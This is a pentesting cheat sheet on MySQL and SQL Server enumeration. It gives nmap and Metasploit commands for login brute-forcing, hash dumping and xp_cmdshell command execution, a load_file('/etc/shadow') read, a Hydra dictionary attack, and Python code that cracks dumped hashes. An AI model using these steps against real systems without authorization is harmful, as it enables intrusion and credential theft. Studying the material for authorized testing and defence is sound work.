🗄️MySQL & MSSQL Enumeration

SQL (Structured Query Language) is the language used to define, query and manipulate relational databases: inserting, updating, selecting and deleting data. The default TCP ports are 1433 (Microsoft SQL Server), 3306 (MySQL) and 5432 (PostgreSQL). SQL Server named instances often listen on a dynamic port instead, and the SQL Server Browser service on UDP 1434 tells clients which one, so scan UDP 1434 alongside TCP 1433.

MySQL - Basic Enumeration

Mysql command-line tool

The mysql command-line client connects to a MySQL server with the given credentials and options and drops you into an interactive SQL prompt.

  • Connecting to a MySQL Database Server: Connects to the server at <target> (IP address or hostname) as <user>. -p prompts for the password (omitting it attempts a passwordless login), and -P <port> is needed when the server does not listen on 3306.

mysql -h <target> -u <user> -p

Common MySQL Command-Line Commands:

  • Select a Database: Every statement is terminated with ; (the prompt shows the selected database in brackets; (none) means none is selected yet). Switch to a database with:

MySQL [(none)]> use <database>;
  • Count the Records in a Table: Counts the number of records in the authors table.

MySQL [books]> select count(*) from authors;
  • Retrieve All Records from a Table: Retrieves all records from the authors table.

MySQL [books]> select * from authors;
  • Attempt to Read a File: Tries to read /etc/shadow through the database server. load_file() requires the FILE privilege, is restricted by the secure_file_priv server variable (NULL disables it entirely, a directory limits reads to that path), and runs as the server's OS user, which normally cannot read /etc/shadow anyway. It returns NULL rather than an error when any of these blocks it, so a NULL result does not prove the file is absent: check SHOW GRANTS and @@secure_file_priv first, or test with a world-readable file such as /etc/passwd.

MySQL [(none)]> select load_file("/etc/shadow");

MySQL & MSSQL: Nmap Enumeration Scripts

  • Gather Basic Information: This command is used with Nmap to gather basic information about Microsoft SQL Server instances during network scanning.

nmap --script ms-sql-info <target>
  • Gather NTLM Authentication Information: Triggers an NTLM challenge from the SQL Server instance and decodes it to reveal the host's NetBIOS and DNS names, domain and product version, all without credentials. The default port is 1433; set mssql.instance-port when the instance listens elsewhere.

nmap --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 192.168.1.10
  • Perform Brute-Force Attacks: Tries username/password combinations against the instance. userdb and passdb are paths to wordlist files (one entry per line), not directories. Failed attempts count against lockout policies for Windows-authenticated logins, so keep the lists short on production systems.

nmap --script ms-sql-brute --script-args userdb=<users.txt>,passdb=<passwords.txt> <target>
  • Detect Empty (Blank) Passwords: This command is used with Nmap to detect Microsoft SQL Server instances with empty (blank) passwords.

nmap --script ms-sql-empty-password <target>
  • Execute SQL Queries: This command is used with Nmap to execute a specific SQL query on a Microsoft SQL Server instance using provided credentials and save the output to output.txt.

nmap --script ms-sql-query --script-args mssql.username=<username>,mssql.password=<password>,ms-sql-query.query="SELECT * FROM master..syslogins" -oN output.txt <target>
  • Dump Password Hashes: This command is used with Nmap to attempt dumping password hashes from a Microsoft SQL Server instance using provided credentials.

nmap --script ms-sql-dump-hashes --script-args mssql.username=<username>,mssql.password=<password> <target>
  • Execute Commands via xp_cmdshell: Runs the given OS command through the xp_cmdshell extended stored procedure. SQL Server executes it with cmd.exe on Windows, so use Windows commands (ipconfig, whoami). xp_cmdshell is disabled by default and turning it on through sp_configure requires sysadmin rights, so this only works with a privileged login.

nmap --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=pass,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.1.10
  • Detect Empty (Blank) Passwords: This command is used with Nmap to detect MySQL servers with empty (blank) passwords.

nmap --script mysql-empty-password <target>
  • Gather Basic MySQL Information: Reads the greeting the server sends before any authentication and reports the protocol version, server version, thread ID, status flags, capability flags and the auth salt. No credentials are needed.

nmap --script mysql-info <target>
  • Identify MySQL Users: This command is used with Nmap to identify MySQL users on the target server, attempting to authenticate using the username root and an empty password.

nmap --script mysql-users --script-args="mysqluser='root',mysqlpass=''" <target>
  • Enumerate MySQL Databases: This command is used with Nmap to enumerate MySQL databases on the target server, trying to authenticate using the username root and an empty password.

nmap --script mysql-databases --script-args="mysqluser='root',mysqlpass=''" <target>
  • Retrieve MySQL Server Variables: This command is used with Nmap to retrieve MySQL server variables from the target, attempting to authenticate with the username root and an empty password.

nmap --script mysql-variables --script-args="mysqluser='root',mysqlpass=''" <target>
  • Dump MySQL Password Hashes: Dumps the hashes from mysql.user in a format John the Ripper and hashcat accept. The login needs read access to mysql.user (normally root); this script takes username and password as arguments.

nmap --script mysql-dump-hashes --script-args="username='root',password=''" <target>
  • Execute a Specific SQL Query: Runs the query "select count(*) from books.authors;" on the server, authenticating as root with an empty password.

nmap --script mysql-query --script-args="query='select count(*) from books.authors;',username='root',password=''" <target>
  • Perform a MySQL Security Audit: Checks the server configuration against the CIS benchmark rules in the audit file shipped with Nmap. This script takes mysql-audit.username, mysql-audit.password and mysql-audit.filename (not mysqluser/mysqlpass); the filename argument is mandatory.

nmap --script mysql-audit --script-args="mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'" <target>
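Everything mysql-info reports comes from the server greeting (Handshake V10), which MySQL sends before the client authenticates. The following is an added Python example, not code from the original page or from Nmap, that parses such a greeting and flags the two things a tester cares about at this stage: no CLIENT_SSL capability means logins and queries cross the wire in clear text, and a mysql_native_password default plugin means any hashes you later dump are unsalted SHA1. The greeting bytes are constructed inline by build_handshake (the version string, thread ID and salt are made up); parse_handshake works just as well on the first packet captured from a real server.

```python
"""Parse the MySQL server greeting (Handshake V10), the unauthenticated packet
that mysql-info decodes for version, capabilities, status and auth salt."""
import struct
from typing import Dict, List

# capability bits from the MySQL client/server protocol
CAPABILITIES: Dict[str, int] = {
    "CLIENT_LONG_PASSWORD": 0x00000001,
    "CLIENT_CONNECT_WITH_DB": 0x00000008,
    "CLIENT_PROTOCOL_41": 0x00000200,
    "CLIENT_SSL": 0x00000800,
    "CLIENT_SECURE_CONNECTION": 0x00008000,
    "CLIENT_PLUGIN_AUTH": 0x00080000,
}


def parse_handshake(packet: bytes) -> dict:
    """Decode a raw greeting: 3-byte little-endian length, 1-byte sequence id, V10 payload."""
    length = int.from_bytes(packet[:3], "little")
    body = packet[4:4 + length]
    if len(body) != length or packet[3] != 0:
        raise ValueError("truncated packet or unexpected sequence id")
    if body[0] != 0x0A:
        raise ValueError(f"not a Handshake V10 greeting (protocol {body[0]})")
    end = body.index(b"\x00", 1)
    version = body[1:end].decode("ascii", "replace")
    pos = end + 1
    thread_id, = struct.unpack_from("<I", body, pos)
    pos += 4
    salt = body[pos:pos + 8]            # auth-plugin-data part 1
    pos += 8 + 1                        # skip part 1 and the 0x00 filler
    caps_low, = struct.unpack_from("<H", body, pos)
    charset = body[pos + 2]
    status, = struct.unpack_from("<H", body, pos + 3)
    caps_high, = struct.unpack_from("<H", body, pos + 5)
    auth_len = body[pos + 7]
    pos += 8 + 10                       # the fields above plus 10 reserved bytes
    caps = caps_low | (caps_high << 16)
    plugin = None
    if caps & CAPABILITIES["CLIENT_SECURE_CONNECTION"]:
        part2_len = max(13, auth_len - 8)   # part 2 is NUL-padded to at least 13 bytes
        salt += body[pos:pos + part2_len].rstrip(b"\x00")
        pos += part2_len
    if caps & CAPABILITIES["CLIENT_PLUGIN_AUTH"]:
        plugin = body[pos:body.index(b"\x00", pos)].decode("ascii", "replace")
    return {
        "protocol": body[0],
        "version": version,
        "thread_id": thread_id,
        "charset": charset,
        "status_flags": status,
        "capability_flags": caps,
        "capabilities": {name: bool(caps & bit) for name, bit in CAPABILITIES.items()},
        "salt": salt,
        "auth_plugin": plugin,
    }


def assess(info: dict) -> List[str]:
    """What a tester wants to know before sending a single credential."""
    findings = []
    if not info["capabilities"]["CLIENT_SSL"]:
        findings.append("CLIENT_SSL not offered: logins and queries cross the network in clear text")
    if info["auth_plugin"] == "mysql_native_password":
        findings.append("default plugin mysql_native_password: stored hashes are unsalted SHA1(SHA1(pw))")
    if not info["capabilities"]["CLIENT_PROTOCOL_41"]:
        findings.append("pre-4.1 protocol: very old server, expect the weak old_password scheme")
    return findings


def build_handshake(version: bytes = b"8.0.36", thread_id: int = 42, caps: int = 0x00DFFFFF,
                    salt1: bytes = b"ABCDEFGH", salt2: bytes = b"IJKLMNOPQRST",
                    plugin: bytes = b"caching_sha2_password") -> bytes:
    """Assemble a greeting the way the server lays it out. Used only for the constructed
    samples below (all values made up); capture a real one with tcpdump or Wireshark."""
    body = bytes([0x0A]) + version + b"\x00"
    body += struct.pack("<I", thread_id) + salt1 + b"\x00"
    body += struct.pack("<HBH", caps & 0xFFFF, 0xFF, 0x0002)   # caps low, utf8mb4, autocommit
    body += struct.pack("<HB", caps >> 16, len(salt1) + len(salt2) + 1) + b"\x00" * 10
    body += salt2 + b"\x00" + plugin + b"\x00"
    return len(body).to_bytes(3, "little") + b"\x00" + body


# Constructed sample greetings (not real captures): a current server with TLS,
# and a legacy one without CLIENT_SSL that defaults to mysql_native_password.
SAMPLE_GREETING = build_handshake()
LEGACY_GREETING = build_handshake(version=b"5.5.62-log", caps=0x00DFF7FF,
                                  plugin=b"mysql_native_password")

if __name__ == "__main__":
    for pkt in (SAMPLE_GREETING, LEGACY_GREETING):
        info = parse_handshake(pkt)
        print(info["version"], info["auth_plugin"], info["salt"], assess(info))
```

The 20-byte salt the parser reassembles (part 1 plus part 2) is the challenge the client scrambles the password with, so a captured greeting plus the client's reply is enough for an offline attack when the plugin is mysql_native_password; that is the reason the CLIENT_SSL finding matters.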

MySQL & MSSQL: Metasploit Enumeration Scripts

  • Brute-Force SQL Server Logins: In msfconsole, auxiliary/scanner/mssql/mssql_login tries username/password lists against SQL Server instances (set RHOSTS, USER_FILE and PASS_FILE).

use auxiliary/scanner/mssql/mssql_login
  • Enumerate SQL Server Logins: auxiliary/admin/mssql/mssql_enum_sql_logins lists the SQL logins on an instance once you have a valid login.

use auxiliary/admin/mssql/mssql_enum_sql_logins
  • Execute Commands: auxiliary/admin/mssql/mssql_exec runs an OS command (CMD option) through xp_cmdshell; it enables xp_cmdshell when it is off, so it needs a sysadmin login.

use auxiliary/admin/mssql/mssql_exec
  • Enumerate Domain Accounts: auxiliary/admin/mssql/mssql_enum_domain_accounts makes the SQL Server resolve domain SIDs with SUSER_SNAME, listing domain users and groups through the database so you do not need to query the domain controller yourself.

use auxiliary/admin/mssql/mssql_enum_domain_accounts
  • Scan for Writable Directories: auxiliary/scanner/mysql/mysql_writable_dirs tests a list of directories with SELECT ... INTO DUMPFILE to find where the MySQL server can write files; it needs the FILE privilege and is limited by secure_file_priv.

use auxiliary/scanner/mysql/mysql_writable_dirs
  • Retrieve MySQL Password Hashes: auxiliary/scanner/mysql/mysql_hashdump dumps the hashes from mysql.user using a privileged login (set USERNAME and PASSWORD).

use auxiliary/scanner/mysql/mysql_hashdump
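ms-sql-dump-hashes, mysql-dump-hashes and mysql_hashdump all leave you with hashes to work on offline, and the first question is which format each one is. The following is an added Python example, not code from the original page, Nmap or Metasploit: it implements the three formats you get back (MySQL's unsalted SHA1(SHA1(pw)), SQL Server 2005's salted SHA1 and SQL Server 2012+'s salted SHA512), identifies a dumped hash by prefix and length, maps it to the hashcat mode, and runs a dictionary check across a dump. The sample dump is constructed: the MySQL entry is the well-known hash of "password", the SQL Server entries are generated here with a fixed, made-up salt, and the usernames and wordlist are invented.

```python
"""Offline checks on password hashes dumped from MySQL and SQL Server."""
import hashlib
from typing import Dict, List, Optional

# hashcat modes for the three formats handled below
HASHCAT_MODES = {"mysql41": 300, "mssql2005": 132, "mssql2012": 1731}


def mysql_native_hash(password: str) -> str:
    """mysql_native_password value stored in mysql.user: '*' + SHA1(SHA1(pw)), no salt."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def mssql_hash(password: str, salt: bytes, version: int = 2012) -> str:
    """password_hash column of master.sys.sql_logins (what ms-sql-dump-hashes prints).
    SQL Server 2005-2008: 0x0100 + salt(4) + SHA1(UTF-16LE(pw) + salt)
    SQL Server 2012+:     0x0200 + salt(4) + SHA512(UTF-16LE(pw) + salt)"""
    if len(salt) != 4:
        raise ValueError("SQL Server salts are 4 bytes")
    data = password.encode("utf-16-le") + salt
    if version >= 2012:
        return "0x0200" + salt.hex().upper() + hashlib.sha512(data).hexdigest().upper()
    return "0x0100" + salt.hex().upper() + hashlib.sha1(data).hexdigest().upper()


def identify(hash_str: str) -> str:
    """Classify a dumped hash by prefix and length so the right routine and mode are used."""
    h = hash_str.strip().upper()
    if h.startswith("*") and len(h) == 41:
        return "mysql41"
    if h.startswith("0X0100") and len(h) == 6 + 8 + 40:
        return "mssql2005"
    if h.startswith("0X0200") and len(h) == 6 + 8 + 128:
        return "mssql2012"
    raise ValueError(f"unrecognised hash format: {hash_str[:12]}")


def check(hash_str: str, candidate: str) -> bool:
    """True if candidate is the password behind hash_str (case of the hex does not matter)."""
    kind = identify(hash_str)
    target = hash_str.strip().upper()
    if kind == "mysql41":
        return mysql_native_hash(candidate) == target
    salt = bytes.fromhex(target[6:14])          # the salt sits right after the 0x0n00 tag
    version = 2012 if kind == "mssql2012" else 2005
    return mssql_hash(candidate, salt, version).upper() == target


def crack(dumped: Dict[str, str], wordlist: List[str]) -> Dict[str, Optional[str]]:
    """Dictionary attack over every dumped account; None where no word matched."""
    return {user: next((w for w in wordlist if check(h, w)), None)
            for user, h in dumped.items()}


# Constructed sample dump: the MySQL hash is the well-known hash of "password";
# the SQL Server hashes are generated here with a fixed salt (real salts are random).
SAMPLE_SALT = bytes.fromhex("A1B2C3D4")
DUMPED = {
    "root@%": "*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19",
    "sa": mssql_hash("Winter2024!", SAMPLE_SALT, 2012),
    "svc_backup": mssql_hash("backup", SAMPLE_SALT, 2005),
}
WORDLIST = ["123456", "password", "backup", "Winter2024!"]

if __name__ == "__main__":
    for user, h in DUMPED.items():
        kind = identify(h)
        print(f"{user}: {kind} (hashcat -m {HASHCAT_MODES[kind]})")
    print(crack(DUMPED, WORDLIST))
```

For real dumps you would hand the hashes to hashcat with the mode identify() returns; the check() routine is for confirming a single candidate or a short list without leaving the shell. Note that SQL Server 2000's 0x0100 format is longer (it carries a second, upper-cased SHA1) and is not handled here.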

MySQL: Dictionary Attack

  • In msfconsole, auxiliary/scanner/mysql/mysql_login tries username/password lists against MySQL servers (set RHOSTS with USER_FILE and PASS_FILE, or USERNAME and PASS_FILE for a single account).

use auxiliary/scanner/mysql/mysql_login
  • Hydra dictionary attack against a MySQL server: tries every password in unix_passwords.txt for the root login (-l is a single username, -P a wordlist; add -s <port> when the server is not on 3306). Keep the thread count low (-t 4) so the server's connection limits do not start refusing the attempts before the list is exhausted.

hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <target> mysql

Hacker's Mantra: Garbage can provide important details for hackers: names, telephone numbers, a company's internal jargon. - Kevin Mitnick
